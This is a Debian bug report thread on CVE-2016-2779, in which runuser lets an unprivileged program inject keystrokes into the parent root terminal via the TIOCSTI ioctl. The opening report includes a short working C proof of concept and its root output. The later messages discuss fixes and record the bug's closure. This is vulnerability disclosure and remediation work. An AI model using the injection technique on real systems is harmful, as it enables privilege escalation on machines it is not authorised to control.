Debian Bug report logs -
#815922
util-linux: CVE-2016-2779: runuser tty hijacking via TIOCSTI ioctl
Reported by: up201407890@alunos.dcc.fc.up.pt
Date: Thu, 25 Feb 2016 18:54:02 UTC
Severity: important
Tags: security, upstream
Found in version util-linux/2.24.2-1
Fixed in version 2.31.1-0.1
Done: Chris Hofstaedtler <zeha@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux.
(Thu, 25 Feb 2016 18:54:06 GMT) (full text, mbox, link).
Acknowledgement sent
to up201407890@alunos.dcc.fc.up.pt:
New Bug report received and forwarded. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>.
(Thu, 25 Feb 2016 18:54:06 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: util-linux
Version: all
Severity: important
When executing a program via "runuser -u nonpriv program" the
nonpriv session can
escape to the parent session by using the TIOCSTI ioctl to push
characters into the
terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" by calling setsid() and in "sudo" by
using the "use_pty" flag
# cat test.c
#include <sys/ioctl.h>
int main()
{
char *cmd = "id\n";
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
}
# gcc test.c -o test
# id saken
uid=1000(saken) gid=1000(saken) groups=1000(saken)
# runuser -u saken ./test ---> last command i type in
id
# id ---> did not type this
uid=0(root) gid=0(root) groups=0(root)
Thanks,
Federico Bento
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux.
(Fri, 26 Feb 2016 15:18:17 GMT) (full text, mbox, link).
Acknowledgement sent
to Phil Susi <psusi@ubuntu.com>:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>.
(Fri, 26 Feb 2016 15:18:17 GMT) (full text, mbox, link).
Message #10 received at 815922@bugs.debian.org (full text, mbox, reply):
On 2/25/2016 1:51 PM, up201407890@alunos.dcc.fc.up.pt wrote:
> When executing a program via "runuser -u nonpriv program" the
> nonpriv session can
> escape to the parent session by using the TIOCSTI ioctl to push
> characters into the
> terminal's input buffer, allowing privilege escalation.
> This issue has been fixed in "su" by calling setsid() and in "sudo" by
> using the "use_pty" flag
How does setsid() help this? And wouldn't it break the ability to use
ctrl-c and ctrl-z on the child program ( since the child won't have a
controlling terminal )? I would think the fix would be to simply flush
the terminal input buffer after the child exits.
No longer marked as found in versions all.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sat, 27 Feb 2016 06:51:09 GMT) (full text, mbox, link).
Added tag(s) security.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sat, 27 Feb 2016 06:51:14 GMT) (full text, mbox, link).
Marked as found in versions util-linux/2.24.2-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sat, 27 Feb 2016 07:03:03 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux.
(Sat, 27 Feb 2016 09:57:03 GMT) (full text, mbox, link).
Acknowledgement sent
to up201407890@alunos.dcc.fc.up.pt:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>.
(Sat, 27 Feb 2016 09:57:03 GMT) (full text, mbox, link).
Message #21 received at 815922@bugs.debian.org (full text, mbox, reply):
Quoting "Phil Susi" <psusi@ubuntu.com>:
> How does setsid() help this? And wouldn't it break the ability to use
> ctrl-c and ctrl-z on the child program ( since the child won't have a
> controlling terminal )? I would think the fix would be to simply flush
> the terminal input buffer after the child exits.
>
Hello Phil,
Most of your questions are answered here:
https://bugzilla.redhat.com/show_bug.cgi?id=173008
And yes, there would be no job control if you started a shell from
there. This is why in "su" setsid() is called only with "-c",
partially fixing the issue. If one would to "su - user" it would still
be vulnerable.
http://www.openwall.com/lists/oss-security/2016/02/25/6
The same pkexec issue got assigned CVE-2016-2568 yesterday, if you
read my PS: "I don't believe any of the previous mentions of fixes for
"su" and
"sudo" would work here, since executing a shell via pkexec would make it not
have job control."
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
Added tag(s) upstream.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sat, 27 Feb 2016 16:18:13 GMT) (full text, mbox, link).
Changed Bug title to 'util-linux: CVE-2016-2779: runuser tty hijacking via TIOCSTI ioctl' from 'runuser tty hijacking via TIOCSTI ioctl'
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sat, 27 Feb 2016 16:18:14 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux.
(Mon, 29 Feb 2016 14:51:14 GMT) (full text, mbox, link).
Acknowledgement sent
to Phil Susi <psusi@ubuntu.com>:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>.
(Mon, 29 Feb 2016 14:51:14 GMT) (full text, mbox, link).
Message #30 received at 815922@bugs.debian.org (full text, mbox, reply):
On 2/27/2016 4:23 AM, up201407890@alunos.dcc.fc.up.pt wrote:
> And yes, there would be no job control if you started a shell from
> there. This is why in "su" setsid() is called only with "-c", partially
> fixing the issue. If one would to "su - user" it would still be vulnerable.
That isn't good. Shouldn't only the foreground process group be allowed
to use this ioctl, thus preventing any background forked processes from
exploiting this?
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux.
(Mon, 29 Feb 2016 18:33:07 GMT) (full text, mbox, link).
Acknowledgement sent
to up201407890@alunos.dcc.fc.up.pt:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>.
(Mon, 29 Feb 2016 18:33:07 GMT) (full text, mbox, link).
Message #35 received at 815922@bugs.debian.org (full text, mbox, reply):
Quoting "Phil Susi" <psusi@ubuntu.com>:
> On 2/27/2016 4:23 AM, up201407890@alunos.dcc.fc.up.pt wrote:
>> And yes, there would be no job control if you started a shell from
>> there. This is why in "su" setsid() is called only with "-c", partially
>> fixing the issue. If one would to "su - user" it would still be vulnerable.
>
> That isn't good. Shouldn't only the foreground process group be allowed
> to use this ioctl, thus preventing any background forked processes from
> exploiting this?
I believe that is up to kernel developers.
grsecurity released a new feature named GRKERNSEC_HARDEN_TTY on Feb 18
that disallows the use of TIOCSTI to unprivileged users, unless they
have the CAP_SYS_ADMIN capability, mitigating these issues.
He said looking into it, he didn't find any legitimate uses of such ioctl.
Check out gr_handle_tiocsti()
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux.
(Tue, 01 Mar 2016 13:36:11 GMT) (full text, mbox, link).
Acknowledgement sent
to Phil Susi <psusi@ubuntu.com>:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>.
(Tue, 01 Mar 2016 13:36:11 GMT) (full text, mbox, link).
Message #40 received at 815922@bugs.debian.org (full text, mbox, reply):
On 2/29/2016 1:29 PM, up201407890@alunos.dcc.fc.up.pt wrote:
> He said looking into it, he didn't find any legitimate uses of such ioctl.
That was the other thing I was wondering about: why would such a silly
and security problematic ioctl exist in the first place? I guess that
answers it, and removing or restricting it means we don't break job
control. That sounds like the proper fix instead of using setsid().
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux.
(Thu, 03 Mar 2016 14:18:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Stanislav Brabec <sbrabec@suse.cz>:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>.
(Thu, 03 Mar 2016 14:18:03 GMT) (full text, mbox, link).
Message #45 received at 815922@bugs.debian.org (full text, mbox, reply):
I just opened a discussion on the upstream util-linux list:
http://marc.info/?t=145694748900001&r=1&w=2
Discussion there proposes to fix it in the kernel:
Disallow the use of TIOCSTI to unprivileged users unless the caller has
CAP_SYS_ADMIN.
--
Best Regards / S pozdravem,
Stanislav Brabec
software developer
---------------------------------------------------------------------
SUSE LINUX, s. r. o. e-mail: sbrabec@suse.com
Lihovarská 1060/12 tel: +49 911 7405384547
190 00 Praha 9 fax: +420 284 084 001
Czech Republic http://www.suse.cz/
PGP: 830B 40D5 9E05 35D8 5E27 6FA3 717C 209F A04F CD76
Reply sent
to Chris Hofstaedtler <zeha@debian.org>:
You have taken responsibility.
(Wed, 08 Aug 2018 18:51:06 GMT) (full text, mbox, link).
Notification sent
to up201407890@alunos.dcc.fc.up.pt:
Bug acknowledged by developer.
(Wed, 08 Aug 2018 18:51:06 GMT) (full text, mbox, link).
Message #50 received at 815922-done@bugs.debian.org (full text, mbox, reply):
Version: 2.31.1-0.1
Upstream had this to say for the 2.31.0 release:
CVE-2016-2779
The new experimental "su --pty" feature has been implemented to fix this issue.
The feature is not enabled by default and the new command line option --pty is
necessary.
The classic way is to use setsid() to disable the ioctl TIOCSTI. Unfortunately,
setsid() has well-defined use cases in su(1) and runuser(1) and any changes
would introduce regressions. The setsid() also does not fix core of the problem
that is terminal file descriptors shared between privileged and unprivileged
sessions.
Note:
runuser uses the su-common code, and also got the --pty flag.
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Thu, 06 Sep 2018 07:26:00 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 15:04:49 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon